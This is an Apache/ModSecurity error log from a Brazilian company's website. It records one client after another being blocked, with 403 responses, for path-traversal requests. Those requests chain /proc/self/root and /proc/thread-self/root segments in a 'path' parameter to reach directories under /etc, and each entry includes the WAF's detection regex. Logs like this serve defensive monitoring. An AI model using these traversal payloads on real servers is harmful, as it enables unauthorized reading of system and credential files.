[Tue Mar 17 18:28:45.145022 2026] [:error] [pid 2473:tid 140411590858496] [client 74.7.241.31:55198] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHjaBJNF7axNlVR0UxqAAAABI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:28:46.601323 2026] [:error] [pid 2598:tid 140411565680384] [client 74.7.241.31:55210] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHjhj0p0SRWAqcjGGTRAAAAxU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:28:48.016761 2026] [:error] [pid 2473:tid 140411565680384] [client 74.7.241.31:38322] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHkKBJNF7axNlVR0UxqwAAABU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:28:49.595980 2026] [:error] [pid 31803:tid 140411674785536] [client 74.7.241.31:38336] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHkeyqAr6etmhZHNpA8QAAAEg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:28:58.345798 2026] [proxy_fcgi:error] [pid 29151:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:60768] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:28:58.413677 2026] [:error] [pid 7437:tid 140411632822016] [client 74.7.241.31:44302] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHmgeiSKl8TjouI-Yw1wAAA80"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:29:00.495711 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.241.31:44310] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHnNa6ubjKNq_cu4YhCAAAA0c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:29:01.977265 2026] [:error] [pid 31803:tid 140411649607424] [client 74.7.241.31:44312] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHneyqAr6etmhZHNpA-QAAAEs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:29:03.601353 2026] [:error] [pid 7004:tid 140411666392832] [client 74.7.241.31:44324] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHn8U6Sx0TG1YjmQjHfAAAAok"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:29:04.976103 2026] [:error] [pid 2473:tid 140411624429312] [client 74.7.241.31:44336] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHoKBJNF7axNlVR0UxswAAAA4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:29:05.438504 2026] [:error] [pid 2473:tid 140411649607424] [client 74.7.241.31:44336] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHoaBJNF7axNlVR0UxtAAAAAs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:29:06.783497 2026] [:error] [pid 6296:tid 140411741927168] [client 74.7.241.31:44338] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHonIk7brgkOH-rIWmNAAAAUA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:29:08.115208 2026] [:error] [pid 2598:tid 140411616036608] [client 74.7.241.31:59728] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHpBj0p0SRWAqcjGGTTgAAAw8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:29:11.784095 2026] [:error] [pid 31803:tid 140411574073088] [client 74.7.241.31:59730] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHpeyqAr6etmhZHNpA_wAAAFQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:29:13.181246 2026] [:error] [pid 6296:tid 140411565680384] [client 74.7.241.31:59736] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHqXIk7brgkOH-rIWmOQAAAVU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:29:14.379082 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.243.128:44492] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHqta6ubjKNq_cu4YhFAAAA1c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 18:29:22.137821 2026] [proxy_fcgi:error] [pid 19507:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:33038] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:29:23.508802 2026] [:error] [pid 7437:tid 140411741927168] [client 74.7.241.31:44810] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHsweiSKl8TjouI-Yw4wAAA8A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:29:24.536713 2026] [:error] [pid 7437:tid 140411607643904] [client 74.7.241.31:44810] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHtAeiSKl8TjouI-Yw5gAAA9A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:29:26.343082 2026] [:error] [pid 25836:tid 140411557287680] [client 74.7.241.31:44822] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHtoh-PF_25v4hFRCDqgAAARY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:29:27.877010 2026] [:error] [pid 7004:tid 140411708356352] [client 74.7.241.31:57746] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHt8U6Sx0TG1YjmQjHiQAAAoQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:29:32.107637 2026] [:error] [pid 29151:tid 140411649607424] [client 74.7.243.128:53628] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHvPPqhzTj3BvfDX-glgAAAcs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 18:29:32.871170 2026] [:error] [pid 2473:tid 140411716749056] [client 74.7.241.31:57758] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHvKBJNF7axNlVR0UxxwAAAAM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:29:34.578944 2026] [:error] [pid 19507:tid 140411557287680] [client 74.7.241.31:57762] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHvtY0UrI5A3LftIwXFwAAAZY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
